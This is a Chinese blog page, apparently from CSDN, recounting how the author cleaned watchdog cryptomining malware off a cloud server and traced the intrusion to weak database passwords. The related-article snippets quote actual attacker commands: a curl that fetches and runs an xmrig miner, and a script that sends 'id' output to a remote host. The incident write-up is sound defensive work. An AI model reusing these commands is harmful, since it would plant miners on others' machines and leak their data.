云服务器中挖矿病毒watchdog记录

最新推荐文章于 2025-03-16 15:34:36 发布
最新推荐文章于 2025-03-16 15:34:36 发布
阅读量2.4k 收藏 2
点赞数 4
分类专栏: 网络安全 文章标签: linux java 数据库 安全漏洞 云服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/c_o_d_e_/article/details/114860314
版权

晚上收到阿里云服务器被攻击的紧急邮件,登录控制台就发现遭到了恶意植入挖矿病毒,直接把我cpu资源吃完了,可恨。

 

主要是挖矿程序和恶意脚本代码执行,我把这六个问题分别截图,挨个来解决

一、挖矿程序

看这两个挖矿程序的PID相同,直接追踪目标吧。应该是通过恶意植入了一个文件。先通过top查看了资源情况,好家伙,直接抓到凶犯。

 本想着直接kill -9杀掉该进程再说,但看了阿里云社区的相关案例,发现这种挖矿程序似乎还会出现,于是通过ls -l /proc/30282/exe找到了这个文件所在目录,似乎就是阿里云控制台提示的tmp目录,然后再按时间顺序打开目录(ls -lt -al),索性没有出现可疑文件,直接rm掉watchdog就行了。ok,至此解决掉这个恶意程序了。

 

 

二、访问恶意IP

看描述应该是基于上面那个watchdog挖矿文件来实现而已访问的,我想watchdog都已经删了,应该就不用管了。

三、访问恶意下载源

估计就是为了下载watchlog文件

 

四、恶意脚本执行

 这里通过进程链明显可以看到,是我ruoyi-admin.jar出了问题,攻击者就是通过它进行了后面一系列的攻击。这是我用来管理自己项目的一个开源后端框架,于是我跑到它的开源社区寻找相关issues,没想到还真有,哈哈。看了作者和一些开发者的交流,最终定位问题如下:

1数据库问题:可能是Redis、mysql弱密码导致。

2框架本身引用了一些带有漏洞的第三方依赖。

如果是框架本身的漏洞,我暂时也没空换其它框架,也没精力去寻找漏洞挨个修复,所以就先解决弱密码问题吧,看来密码真的不能随便设定啊,算是第一次被这种形式的攻击,涨个教训吧。

总结:其实现在从尾到头看,关键就在于我这个项目暴露了一个关键漏洞,让骇客抓住机会得以植入脚本,再通过脚本远程下载恶意挖矿病毒,最后病毒把cpu资源占满。

 

 

 

排查挖矿病毒
gender123的博客
03-28 4777
场景 最新发现linux服务器一直很卡,导致无法编译和其它相关操作。 排查分析 经top 查看原来是一个叫269 的进程一直抢占CPU,占比高达4000%。而该269 进程则是挖矿病毒进行高度伪装,即使是kill 掉该进程也无济于事,后面又会自动跑起来。 top - 19:29:19 up 1:24, 2 users, load average: 41.71, 41.75, 41.46 Tasks: 891 total, 3 running, 502 sleeping, 0 st..
如何更有效的消灭watchdogs挖矿病毒?华为云DCS Redis为您支招
middleware2018的博客
02-27 1228
漏洞概述 近日,互联网出现watchdogs挖矿病毒,攻击者可以利用Redis未授权访问漏洞入侵服务器,通过内外网扫描感染更多机器。被感染的主机出现 crontab 任务异常、系统文件被删除、CPU 异常等情况,并且会自动感染更多机器,严重影响业务正常运行甚至导致崩溃。 在此,小哥建议您及时开展Redis业务自查并进行升级修复,避免业务和经济损失。   漏洞影响 1、数据泄露。Redis...
记录一次watchdog挖矿
buzenmedi的专栏
06-29 733
突然发现机器cpu很高,一看cpu飙到60% 查了一下进程发现可疑的进程,给干掉了,cpu恢复正常 bash -c curl https://whatsmyipv4.cf/xmrig -o /tmp/watchdog && chmod +x /tmp/watchdog && nohup /tmp/watchdog --donate-level 1 -o sg.minexmr.com:443 -u 44BwEPy6EAHMgi7x2SXq1v3kdokMgKFvxf
RUOYI框架在实际项目中的应用二:Ruoyi前后端分离版本-RuoYi-Vue
最新发布
苍煜
03-16 1521
1、系统环境Java EE 82、主框架3、持久层4、视图层Vue 2.6.xcom.ruoyi├── common // 工具类│ └── annotation // 自定义注解│ └── config // 全局配置│ └── constant // 通用常量│ └── core // 核心控制│ └── enums // 通用枚举│ └── exception // 通用异常│ └── filter // 过滤器处理│ └── utils // 通用类处理。
watchdog 保证服务器的高可用性
qq_35964941的博客
04-18 1374
watchdog 是一款优秀的系统监控工具。普通情况下,它看似无关紧要,但却能在危机关头力挽狂澜。因为它能够在系统资源即将耗尽或即将崩溃时主动重启系统,避免由于硬件罢工而导致的被动重启或宕机造成的数据损失和业务损失。这里将讨论软件watchdog ,而不是硬件watchdog 。      watchdog 实际上是一个用于系统主动重启的计时器,默认倒计时为60秒,系统在60秒内往
服务器watchdog看门狗的理解
weixin_52243202的博客
07-08 650
watchdog,中文名称叫做“看门狗”,全称watchdog timer,从字面上我们可以知道其实它属于一种定时器。然而它与我们平常所接触的定时器在作用上又有所不同。普通的定时器一般起记时作用,记时超时(Timer Out)则引起一个中断,例如触发一个系统时钟中断。
【应急类漏洞】WatchDogsMiner挖矿蠕虫大量感染Linux服务器
Fly_鹏程万里
03-07 1208
近日,深信服安全团队追踪到公有云上及外部Linux服务器存在大量被入侵,表现为/tmp临时目录存在watchdogs文件,出现了crontab任务异常、网络异常、系统文件被删除、CPU异常卡顿等情况,严重影响用户业务。多个用户邀请深信服安全专家远程排查,最终经过分析确认,用户Linux服务器被植入新型恶意挖矿蠕虫,且较难清理。 深信服安全团队将其命名为WatchDogsMiner,并紧急发布预警,...
被动抓病毒的日子(1)【入侵大佬:198.46.202.146】 一种针对Linux服务器疑似挖矿病毒流入
谦怀
03-09 2463
拥有云服务器(尤其是阿里云服务器)的朋友们要注意了!又一种针对Linux服务器疑似挖矿病毒流入,赶紧检查一下吧! 2021年3月8号,发现疑似挖矿病毒的流氓程序入侵,对于平常疏于安全防范的公司敲响了一记警钟。现在就详细分析下病毒的运作逻辑,至于它是干嘛的,有兴趣的小伙伴可以去挖掘一下,也许有比较有趣的收获。 目录 一、概述 二、脚本分析 1:声明和重写内核模块 2:杀死对应服务 3:卸载云盾服务器安全(安骑士)服务 4:生成默认环境变量 5:生成定时任务 6:登录方法声明 7:lib.
confluence挖矿病毒(kdevtmpfsi 、solrd)解决
lin351550660的专栏
01-12 3736
自己安装了conference,没用1周。发现服务器内存被吃完了。 定位问题: 1、之前就听说过confluence 有漏洞 攻击者会利用confluence编辑页面的某个参数进行写入攻击。所以直接在百度搜索:confluence挖矿病毒 2、感谢https://www.cnblogs.com/hack404/p/11464890.html作者的帮助。 处理过程: 1. 先封掉外网HTTP 端口 使用腾讯云控制台 安全组 设置80端口不允许访问。 2. 查杀进程 使用命令:top 查..
kdevtmpfsi挖矿病毒解决过程
weixin_43233341的博客
03-03 3012
top 开始cpu消耗在百分80左右,有时会达到99,杀掉进程后几分钟又跳出来, 开始的升级阿里云的高级版,一键查杀,cpu瞬间降到20 继续跟踪。。。 大概两个小时后发现,kdevtmpfsi进程会时不时跳出来,一两秒钟后又自动关闭,此时cpu 再百分20到百分40直接上下波动,如图(正常情况下是稳得) 解决方法 kdevtmpfsi有守护进程。守护进程名称为 kinsing,需要kill后才...
Watchdog.sys是什么,Watchdog.sys蓝屏如何解决?
热门推荐
qq459080123的博客
12-22 1万+
在一些情况下电脑使用中会出现蓝屏,很多时候蓝屏是由于一些文件损坏或不兼容导致的,如Watchdog.sys引起的蓝屏问题,那么有的朋友会问,Watchdog.sys是什么?Watchdog.sys蓝屏又如何解决呢?带着这些问题,我们一起来看看下面的知识。 Watchdog.sys是什么? Watchdog.sys是一款视频软件PPS中的驱动级文件,并不是病毒。 Watch
linux服务器看门狗服务,服务器watchdog看门狗的理解
weixin_34614674的博客
05-03 3655
1.什么是watchdog?watchdog,中文名称叫做“看门狗”,全称watchdogtimer,从字面上我们可以知道其实它属于一种定时器。然而它与我们平常所接触的定时器在作用上又有所不同。普通的定时器一般起记时作用,记时超时(TimerOut)则引起一个中断,例如触发一个系统时钟中断。熟悉windows开发的朋友应该用过windows的Timer,windowsTimer的作用与方才所...
Linux内核中的Watchdog
weixin_44376670的博客
10-09 5838
linux /dev/watchdog softlockup hardlockup 看门狗 kvm watchdog i6300esb
阿里云服务器被入侵执行MoneroOcean(门罗币)挖矿脚本
weixin_54071027的博客
06-26 1万+
为学习使用Redis,在阿里云Linux服务器上安装了redis并且后台运行,开放了默认端口,而且没有设置访问密码,当天晚上被执行了恶意脚本。 恶意代码如下,分享一下: #!/bin/bash us=$(id) curl "http://oracle.zzhreceive.top/b2f628/idcheck/$us" >>/dev/null ulimit -n 65535 export MOHOME=/usr/share mkdir $MOHOME -p if [ -f "$MOHOME/[
Linux下看门狗/dev/watchdog使用方法
清风伴月的专栏
04-19 5128
文章目录前言看门狗实现代码总结 前言 在嵌入式Linux环境中,SOC通常都集成有硬件看门狗,可跨不同厂家使用; 在ubuntu系统使用下面的代码则需要加载softdog,才能出现/dev/watchdog; // 使能ubuntu看门狗 sudo modprobe softdog 看门狗实现代码 watch_dog.c #include <errno.h> #include <linux/watchdog.h> #include <sys/types.h> #i
Linux挖矿病毒清理通用思路
dayouzi的博客
04-19 4164
在被植入挖矿病毒后,如果攻击者拥有足够的权限,比如root权限,往往会对系统命令进行劫持,达到隐藏自己的效果,故第一步最好是先确认是否存在rootkit劫持、库劫持,之后的命令执行操作也最好是通过busybox执行。
在阿里云里面服务器怎么样可以更好的链接数据库
m0_64068722的博客
11-26 767
环境:阿里云ubuntu服务器 阿里云RDS数据库 问题:如何在阿里云服务器的终端使用shell命令连接RDS云数据库 解决方法: 1.阿里云服务器安装MySQL sudo apt-get install mysql-server 如果出现unable to locate package mysql-server 先使用语句 sudo apt-get update 2.连接阿里云数据库 在阿里云服务器终端 mysql -u root -h RDS数据库连接地址 -p 按提示输入密..
阿里云服务器被watchbog挖矿进程入侵
chuanlie4932的博客
03-01 296
1.查看所有进程 # top 或 ps aux |grep watchbog 看到watchbog进程占用了cpu的199%使用率,最后百度才知道是挖矿病毒。 2杀死进程 killall watchbog 3删除文件 //查看进程 #top //查看进程是否被杀死 //查找watchbo...
Android 中watchdog
01-11
### Android Watchdog机制的作用 在Android系统中,Watchdog扮演着至关重要的角色。其主要职责在于监控System Server以及其它关键服务的状态,防止这些组件因死锁或其他异常情况而陷入无响应状态[^1]。 当检测到任何被监视对象出现问题时,Watchdog会触发一系列操作来尝试恢复系统的正常运行,最极端的情况下甚至可以重启整个设备以保障用户体验不受影响[^3]。 ### 实现方式概述 #### 初始化过程 Watchdog实例化发生在`startBootstrapServices()`方法内部,这是Framework启动流程的一部分: ```java private void startBootstrapServices(@NonNull TimingsTraceAndSlog t) { ... // 尽早启动看门狗以便于能够在早期引导过程中发生死锁时崩溃掉system server t.traceBegin("StartWatchdog"); final Watchdog watchdog = Watchdog.getInstance(); watchdog.start(); ... } ``` 这段代码展示了如何尽早初始化并激活Watchdog实例,从而确保即使是在系统刚刚启动期间也能有效预防潜在的风险。 #### 主要功能模块 - **Binder线程池监测**:通过定期检查SystemServer进程中Binder线程的数量是否达到上限,以此判断是否存在资源耗尽风险。 - **内存管理优化**:针对低内存状况下的处理策略进行了改进,特别是对于lmkd(Low Memory Killer Daemon)这样的核心守护进程给予了特别关注,避免因为长时间等待而导致的服务不可用现象[^2]。 - **定时任务执行器**:利用Handler机制周期性地遍历注册过的检查点(checkpoints),一旦发现某个节点超过了预设的时间阈值,则立即采取相应措施进行干预。 ```java // 定义了一个用于提交新任务给主线程的消息处理器 final Handler mHandler = new Handler(mMainLooper.getQueue()) { @Override public void handleMessage(Message msg) { switch (msg.what) { case MSG_RUN_CHECK: runCheckLocked(false /* not interactive */); break; ... } } }; ``` 此部分实现了基于时间驱动的任务调度逻辑,使得Watchdog能够持续不断地履行自己的监督职能。
评论 11
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值